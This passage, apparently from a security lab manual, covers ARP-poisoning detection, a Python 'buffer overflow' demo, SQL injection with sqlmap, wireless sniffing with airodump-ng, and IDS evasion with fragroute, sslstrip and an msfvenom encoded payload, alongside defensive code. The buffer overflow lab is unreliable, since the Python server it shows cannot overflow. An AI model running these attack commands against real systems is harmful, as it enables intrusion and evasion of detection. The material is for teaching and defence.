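GATEWAY_MAC, VICTIM_MAC = "aa:bb:cc:00:00:01", "aa:bb:cc:00:00:20"
ATTACKER_MAC = "de:ad:be:ef:00:01"

# Constructed ARP replies ("is-at" messages) as a sniffer would log them:
# (time, sender_ip, sender_mac). After a clean baseline the attacker claims
# both victims' addresses and keeps re-announcing to hold the caches poisoned.
SAMPLE_ARP_REPLIES = [
    (0.0, GATEWAY, GATEWAY_MAC),     # the real router
    (0.5, VICTIM, VICTIM_MAC),       # the real victim host
    (10.0, GATEWAY, ATTACKER_MAC),   # "I am the gateway" sent to the victim
    (10.0, VICTIM, ATTACKER_MAC),    # "I am the victim" sent to the gateway
    (11.0, GATEWAY, ATTACKER_MAC),   # repeated to keep the poisoning alive
]


def detect_arp_poisoning(arp_replies):
    """Return alerts for the two fingerprints of the attack above: an IP whose
    advertised MAC changes, and one MAC that claims more than one IP. Each
    alert is a tuple starting with the timestamp and the alert kind."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ts, ip, mac in arp_replies:
        mac = mac.lower()
        known = ip_to_mac.get(ip)
        if known is not None and known != mac:
            alerts.append((ts, "mac_changed", ip, known, mac))
        ip_to_mac[ip] = mac
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > 1:
                alerts.append((ts, "mac_claims_multiple_ips", mac,
                               tuple(sorted(mac_to_ips[mac]))))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_ARP_REPLIES):
        print(alert)
```

Static ARP entries for the gateway, or dynamic ARP inspection on the switch, stop the cache from accepting the forged replies this monitor reports.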
EXPERIMENT 10

Practical Buffer Overflow Demonstration using Python


Buffer overflow can be a complex concept at first but by understanding basic facts,
anyone can get a good grip on it. Buffer overflow vulnerabilities occur when more data is put
into a buffer than it can handle, causing data to overflow into adjacent memory spaces.

Objective:
Understand and exploit a simple buffer overflow vulnerability using Python

Requirements:
● Python (Python 3.x is recommended)

Understanding Buffer Overflow
● Let's create code that is vulnerable to buffer overflow in Python.

# [Link]
import socket

def start_server():
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.bind(('localhost', 12345))
    server_socket.listen(1)
    client_socket, addr = server_socket.accept()
    while True:
        data = client_socket.recv(1024)  # read at most 1024 bytes at a time
        if not data:  # an empty read means the client closed the connection
            break
        print('Received data:', data.decode(errors='replace'))
    client_socket.close()
    server_socket.close()

if __name__ == "__main__":
    start_server()
● In the above Python script, we create a simple TCP server that reads data from the
client in chunks of 1024 bytes.

Exploiting Buffer Overflow
● A potential attacker can try to send more data than this buffer can contain.
We'll simulate this using a Python client.

# [Link]
import socket

def send_data():
    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client_socket.connect(('localhost', 12345))
    payload = 'A' * 5000  # far more than the 1024 bytes the server reads at once
    client_socket.sendall(payload.encode())  # sendall: send() may transmit only part
    client_socket.close()

if __name__ == "__main__":
    send_data()
● In the above Python client, we send 5000 bytes of data to the server which is
way beyond expected 1024 bytes. This is where buffer overflow is taking
place.

Mitigating Buffer Overflow


● A simple approach to mitigating Buffer Overflow involves limiting user input size:

# Secure [Link]
import socket

MAX_INPUT = 1024  # the "buffer" size we are willing to accept from one client

def start_secure_server():
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.bind(('localhost', 12345))
    server_socket.listen(1)
    client_socket, addr = server_socket.accept()
    received = 0  # total bytes accepted from this client so far
    while True:
        data = client_socket.recv(1024)
        if not data:
            break
        # recv(1024) never returns more than 1024 bytes, so the limit has to be
        # enforced on the running total, not on a single read.
        received += len(data)
        if received > MAX_INPUT:  # input exceeds the buffer: reject and stop
            print('Received data is too large.')
            break
        print('Received data:', data.decode(errors='replace'))
    client_socket.close()
    server_socket.close()

if __name__ == "__main__":
    start_secure_server()
● In the secure version of the server, we check the size of the received data against
the buffer limit before processing it. Hence, even if the client sends larger data, the
server handles it safely without causing a buffer overflow.
● To practice this lab, save the vulnerable and secure server scripts as
[Link] and secure_server.py respectively. Similarly, save the client script as
[Link]. Run them locally to simulate the buffer overflow and its mitigation.
EXPERIMENT 11

Exploiting and Mitigating SQL Injection Vulnerabilities


SQL Injection (SQLi) is a code injection technique where hackers can insert malicious
SQL statements into web application database queries. The process of exploiting an SQL
Injection involves making an application execute your SQL statement in a way it was not
intended to.

Objective
● Understand and exploit a simple SQL Injection vulnerability.

Requirements
● SQLmap tool or a similar tool
● Basic understanding of SQL

Understanding SQL Injection
Procedure:
● Consider a vulnerable PHP script which interacts with a MySQL database:

$query = 'SELECT username, email FROM Users WHERE id=' . $_GET['id'];
● In the above script, if an attacker modifies the id parameter in the URL like
[Link]/[Link]?id=1 OR 1=1, it could result in all records
from the Users table being displayed.
● In real-world scenarios, this vulnerability can be exploited to manipulate and
extract sensitive data from a database.

Exploiting SQL Injection Using SQLmap


● SQLmap is an open-source penetration testing tool that automates the
process of detecting and exploiting SQL injection flaws and taking over of
database servers.
● Here's a command to test the website for possible vulnerabilities:

sqlmap -u "[Link]/[Link]?id=1" --dbs
● In the command above, -u specifies the URL to attack, and --dbs instructs
SQLmap to enumerate database names.
● If the website is vulnerable, SQLmap will return a list of all databases in the
server. To enumerate tables in a specific database:

sqlmap -u "[Link]/[Link]?id=1" -D <database_name> --tables
● Here, -D specifies the database name, and --tables commands SQLmap to
enumerate tables within that database.

Mitigating SQL Injection


SQL injection vulnerabilities occur when user input isn't properly sanitized and is
concatenated directly into an SQL query string. To avoid SQL Injection attacks, always sanitize your
inputs and use parameterized queries, so that the structure of the query is fixed before any user
data is bound to it. PHP's PDO and MySQLi extensions both support prepared statements for
this purpose.
Here's an example of a secure PHP script using prepared statements:

$stmt = $pdo->prepare('SELECT username, email FROM Users WHERE id = :id');
$stmt->execute(['id' => $_GET['id']]);

● In this script, :id is a named placeholder; the value of $_GET['id'] is bound to it by the
database driver as data, so it can never alter the structure of the query.
● By practicing and learning more about SQL injections, you'll be better
equipped to write secure code and test applications for these vulnerabilities.
Make sure whenever you test applications for security vulnerabilities, you have
the necessary permissions to do so.
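The vulnerable concatenation and the prepared-statement fix from this experiment, side by side, as an added example that is not part of the lab manual. The manual's code is PHP; this version uses Python with the standard-library sqlite3 module so it runs without a MySQL server (sqlite3's :id placeholder plays the role of PDO's). The Users table and its rows are constructed sample data.

```python
"""Added example (not from the lab manual): string-built query vs. parameterized
query, using an in-memory SQLite database with a constructed Users table."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create an in-memory database holding constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO Users (id, username, email) VALUES (?, ?, ?)",
        [(1, "alice", "alice@example.test"),
         (2, "bob", "bob@example.test"),
         (3, "carol", "carol@example.test")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """Mirror of the vulnerable PHP line: the id value is concatenated into the
    SQL text, so the input can rewrite the WHERE clause."""
    query = "SELECT username, email FROM Users WHERE id=" + user_id
    return conn.execute(query).fetchall()


def lookup_secure(conn: sqlite3.Connection, user_id: str) -> list:
    """Mirror of the PDO prepared statement: the query structure is fixed and
    the value is bound as a parameter, never parsed as SQL."""
    query = "SELECT username, email FROM Users WHERE id = :id"
    return conn.execute(query, {"id": user_id}).fetchall()


def demo() -> dict:
    """Run both lookups with a benign id and with the lab's injected input."""
    conn = make_db()
    benign = "1"
    injected = "1 OR 1=1"  # the input from the lab's example URL
    result = {
        "vulnerable_benign": lookup_vulnerable(conn, benign),
        "vulnerable_injected": lookup_vulnerable(conn, injected),
        "secure_benign": lookup_secure(conn, benign),
        "secure_injected": lookup_secure(conn, injected),
    }
    conn.close()
    return result


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

With the injected input the vulnerable lookup returns every row, while the parameterized lookup compares the id column against the literal string "1 OR 1=1" and returns nothing: the bound value cannot change the query, only be matched by it.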
EXPERIMENT 12

Wireless Network Packet Sniffing and Analysis


Packet Sniffing is the process of capturing and analyzing packets transmitted over a
network. It serves many purposes, from troubleshooting network issues to analyzing network
performance or identifying security vulnerabilities.

Objective
● Learn to capture and analyze wireless network packets.

Requirements
● Wireshark, Aircrack-ng tools
● Knowledge of command line/interface
● A wireless adapter capable of packet capture (monitor mode)
Procedure:
Please note that the activities discussed should be carried out on your own network or
a network you have express permission to use.

Capturing Wireless Network Packets


Firstly, download and install Aircrack-ng and Wireshark on your system. Then, you need to
put your wireless adapter into monitor mode. This is necessary because it allows your adapter to
capture all frames on the channel, not just those addressed to your device. Open your command
line interface and run the following commands:

# Find your wireless network interface
sudo airmon-ng

# Assuming 'wlan0' is your interface; replace it with your own if different
# Start monitor mode
sudo airmon-ng start wlan0

After this, you should see a new monitor mode interface listed, typically named 'mon0'
or 'wlan0mon'.

Sniffing Network Packets


Now, we're ready to start capturing packets:

# Start capturing packets
sudo airodump-ng mon0

This shows you an overview of the wireless networks around you. Once you see
your target network (identified by the router's BSSID), start capturing packets by specifying
its channel (CH) and a file prefix; airodump-ng writes the captured frames to a .cap file for
later analysis:

# Capture packets from a specific channel (assume channel 11) and save to a file
sudo airodump-ng -c 11 -w ~/Desktop/capture_file --essid ROUTER_NAME mon0

Let this run until you feel you've captured enough packets.

Analyzing Network Packets


Now, we can analyze the packets we've captured using Wireshark. Open Wireshark
and load the .cap file you saved earlier (note that airodump-ng numbers its output files,
so the file on disk will be named capture_file-01.cap; adjust the path accordingly):

# Open the capture file with Wireshark
wireshark ~/Desktop/capture_file.cap

Wireshark presents a comprehensive breakdown of each packet: you can see the
source and destination addresses, the protocol in use, the packet length, and the payload.
Browse through the packets, and try using display filters to narrow the view to the frames
you are interested in.
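To show what Wireshark is decoding when it opens the .cap file, here is an added example (not from the lab manual) of a minimal parser for that capture format in Python, using only the standard library. It reads the classic pcap container, decodes 802.11 beacon frames, and produces the same BSSID / channel / encryption / ESSID summary that the airodump-ng screen shows. It assumes the link type airodump-ng uses for its .cap output (raw 802.11 frames, link type 105, no radiotap header); the capture it parses is constructed in code so the example runs offline and is not a real capture.

```python
"""Added example (not from the lab manual): parse an airodump-ng style .cap
file (classic pcap, link type 105) and summarize the beacon frames in it."""
import struct
from dataclasses import dataclass
from typing import Iterator, List, Optional

LINKTYPE_IEEE802_11 = 105  # raw 802.11 frames without a radiotap header


@dataclass
class Beacon:
    bssid: str
    ssid: str
    channel: Optional[int]
    privacy: bool  # capability Privacy bit: WEP/WPA/WPA2 in use


def _mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def iter_pcap_frames(data: bytes) -> Iterator[bytes]:
    """Yield the raw frame bytes of each record in a classic (non-pcapng) pcap."""
    magic = data[:4]
    if magic == b"\xd4\xc3\xb2\xa1":
        end = "<"          # little-endian file, microsecond timestamps
    elif magic == b"\xa1\xb2\xc3\xd4":
        end = ">"          # big-endian file
    else:
        raise ValueError("not a microsecond-resolution classic pcap file")
    linktype = struct.unpack(end + "I", data[20:24])[0]
    if linktype != LINKTYPE_IEEE802_11:
        raise ValueError(f"unsupported link type {linktype}")
    off = 24  # global header is 24 bytes; each record has a 16-byte header
    while off + 16 <= len(data):
        _sec, _usec, incl_len, _orig_len = struct.unpack(end + "IIII", data[off:off + 16])
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def parse_beacon(frame: bytes) -> Optional[Beacon]:
    """Decode a beacon management frame; return None for any other frame."""
    if len(frame) < 36:
        return None
    ftype, subtype = (frame[0] >> 2) & 0x3, (frame[0] >> 4) & 0xF
    if ftype != 0 or subtype != 8:  # type 0 = management, subtype 8 = beacon
        return None
    bssid = _mac(frame[16:22])  # Address 3 carries the BSSID in a beacon
    _timestamp, _interval, capability = struct.unpack_from("<QHH", frame, 24)
    privacy = bool(capability & 0x0010)
    ssid, channel, off = "", None, 36  # tagged parameters start at byte 36
    while off + 2 <= len(frame):
        tag, length = frame[off], frame[off + 1]
        body = frame[off + 2:off + 2 + length]
        if len(body) < length:  # truncated element (or a trailing FCS): stop
            break
        if tag == 0:  # SSID element
            ssid = body.decode("utf-8", "replace") or "<hidden>"
        elif tag == 3 and length == 1:  # DS Parameter Set: current channel
            channel = body[0]
        off += 2 + length
    return Beacon(bssid, ssid, channel, privacy)


def summarize(data: bytes) -> List[Beacon]:
    """One entry per BSSID, like the access-point table of airodump-ng."""
    seen = {}
    for frame in iter_pcap_frames(data):
        b = parse_beacon(frame)
        if b is not None and b.bssid not in seen:
            seen[b.bssid] = b
    return list(seen.values())


# --- constructed sample capture (not a real recording) --------------------
def build_beacon(bssid: bytes, ssid: str, channel: int, privacy: bool) -> bytes:
    header = b"\x80\x00" + b"\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x10\x00"
    fixed = struct.pack("<QHH", 0x1234, 100, 0x0001 | (0x0010 if privacy else 0))
    elements = bytes([0, len(ssid)]) + ssid.encode() + bytes([3, 1, channel])
    return header + fixed + elements


def build_pcap(frames: List[bytes]) -> bytes:
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11)]
    for i, f in enumerate(frames):
        out.append(struct.pack("<IIII", 1700000000 + i, 0, len(f), len(f)) + f)
    return b"".join(out)


SAMPLE_CAPTURE = build_pcap([
    build_beacon(bytes.fromhex("001122334455"), "LabNet", 11, True),
    b"\x08\x00" + b"\x00" * 22 + b"data frame payload",  # data frame: skipped
    build_beacon(bytes.fromhex("66778899aabb"), "OpenCafe", 6, False),
    build_beacon(bytes.fromhex("001122334455"), "LabNet", 11, True),  # repeat
])

if __name__ == "__main__":
    for b in summarize(SAMPLE_CAPTURE):
        print(f"{b.bssid}  CH {b.channel:>2}  {'WEP/WPA' if b.privacy else 'OPN':8} {b.ssid}")
```

The parser stops at the first truncated element, which also keeps a trailing frame check sequence (present in some captures) from being misread as data; the Privacy bit only says that encryption is in use, and distinguishing WEP from WPA/WPA2 would require decoding the RSN and vendor-specific elements as Wireshark does.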
EXPERIMENT 13

Intrusion Detection System (IDS) Evasion Techniques

Objectives
● Learn how IDS evasion techniques are deployed and how they work.
● Understand the different strategies used to bypass an IDS.

Requirements
● Kali Linux (Attacker machine)
● Windows 10 (Target machine)
● IDS (Snort, Suricata, or others)

IDS Evasion using IP Fragmentation:


● IP fragmentation splits the malicious payload across multiple packets, so that an IDS
which inspects each packet in isolation never sees the complete pattern. We can use
'fragroute' in Kali Linux to accomplish this.
● Launch Terminal on your Kali machine.
● Execute the following command, replacing the <Target IP address> with your actual
target:

sudo fragroute -f /etc/[Link] <Target IP address>
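From the defender's side, the counter to this technique is to reassemble fragments before matching signatures. The following added example (not from the lab manual) illustrates both sides in Python with only the standard library: a constructed HTTP request containing a constructed signature string is split into IPv4 fragments, a per-packet matcher misses it, and a matcher that reassembles the datagram first finds it, including when the fragments arrive out of order. The addresses, IP identification value and signature are all sample values.

```python
"""Added example (not from the lab manual): per-packet signature matching
misses a pattern split across IPv4 fragments; matching after reassembly does not."""
import struct
from typing import Dict, List, Optional, Tuple

SIGNATURE = b"EVIL_PATTERN_123"  # constructed stand-in for an IDS content rule
MF_FLAG = 0x2000                # IPv4 "More Fragments" bit in the flags/offset field
FlowKey = Tuple[bytes, bytes, int, int]


def build_ipv4(ident: int, frag_offset_units: int, more: bool, payload: bytes) -> bytes:
    """IPv4 header (no options, checksum left as 0) followed by a payload chunk."""
    flags_frag = (MF_FLAG if more else 0) | (frag_offset_units & 0x1FFF)
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ident,
                         flags_frag, 64, 6, 0, bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    return header + payload


def fragment(ident: int, payload: bytes, chunk: int = 16) -> List[bytes]:
    """Split a payload into fragments; chunk must be a multiple of 8 (the offset unit)."""
    assert chunk % 8 == 0
    frags = []
    for i in range(0, len(payload), chunk):
        frags.append(build_ipv4(ident, i // 8, i + chunk < len(payload), payload[i:i + chunk]))
    return frags


def parse_ipv4(pkt: bytes) -> dict:
    ihl = (pkt[0] & 0x0F) * 4
    total_len, ident, flags_frag = struct.unpack_from("!HHH", pkt, 2)
    key: FlowKey = (pkt[12:16], pkt[16:20], ident, pkt[9])  # src, dst, id, protocol
    return {"key": key, "more": bool(flags_frag & MF_FLAG),
            "offset": (flags_frag & 0x1FFF) * 8, "payload": pkt[ihl:total_len]}


def per_packet_match(packets: List[bytes], sig: bytes = SIGNATURE) -> bool:
    """Naive detector: inspects each datagram on the wire in isolation."""
    return any(sig in parse_ipv4(p)["payload"] for p in packets)


class Reassembler:
    """Collects fragments per (src, dst, id, protocol) and hands back the datagram
    once every byte from offset 0 up to the end of the last fragment is present."""

    def __init__(self) -> None:
        self.flows: Dict[FlowKey, dict] = {}

    def feed(self, pkt: bytes) -> Optional[bytes]:
        f = parse_ipv4(pkt)
        flow = self.flows.setdefault(f["key"], {"parts": {}, "total": None})
        flow["parts"].setdefault(f["offset"], f["payload"])  # keep the first copy seen
        if not f["more"]:
            flow["total"] = f["offset"] + len(f["payload"])  # last fragment fixes the size
        if flow["total"] is None:
            return None
        data, pos = bytearray(), 0
        while pos < flow["total"]:
            part = flow["parts"].get(pos)
            if part is None:
                return None  # gap: a fragment is still missing
            data += part
            pos += len(part)
        del self.flows[f["key"]]
        return bytes(data)


def reassembled_match(packets: List[bytes], sig: bytes = SIGNATURE) -> bool:
    """Detector that matches only on fully reassembled datagrams."""
    reassembler = Reassembler()
    for p in packets:
        datagram = reassembler.feed(p)
        if datagram is not None and sig in datagram:
            return True
    return False


REQUEST = b"GET /search?q=" + SIGNATURE + b" HTTP/1.1\r\n"  # constructed payload

if __name__ == "__main__":
    whole = [build_ipv4(0x1234, 0, False, REQUEST)]
    frags = fragment(0x1234, REQUEST)
    print("unfragmented, per-packet :", per_packet_match(whole))
    print("fragmented,   per-packet :", per_packet_match(frags))
    print("fragmented,   reassembled:", reassembled_match(frags))
    print("out of order, reassembled:", reassembled_match(frags[::-1]))
```

The reassembler keeps the first copy of any offset it sees; real IDS engines must additionally pick an overlap policy that matches the target host's stack, since overlapping fragments with conflicting content are the next evasion step once plain fragmentation is handled.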

IDS Evasion Using Encryption:


● Encrypting the malicious traffic can prevent IDS from inspecting the payloads.
● In Kali Linux, use sslstrip to strip SSL, thereby forcing the browser to use HTTP
instead of HTTPS:

sslstrip -a -k -f
● Note: sslstrip -a -k -f intercepts all connections (-a), kills old sessions (-k), and fakes
SSL certificates (-f).

Using Encoding Techniques to Bypass IDS:


● Certain encoding mechanisms like XOR or Base64 can help bypass IDS detection.
We will use Metasploit for this.
● Launch Metasploit using the following command:

msfconsole

● Now, generate a payload, using the -e option to encode it with the
x86/shikata_ga_nai encoder and -i to apply 20 encoding iterations:

msfvenom -p (payload) -f exe -e x86/shikata_ga_nai -i 20 -o (filename).exe
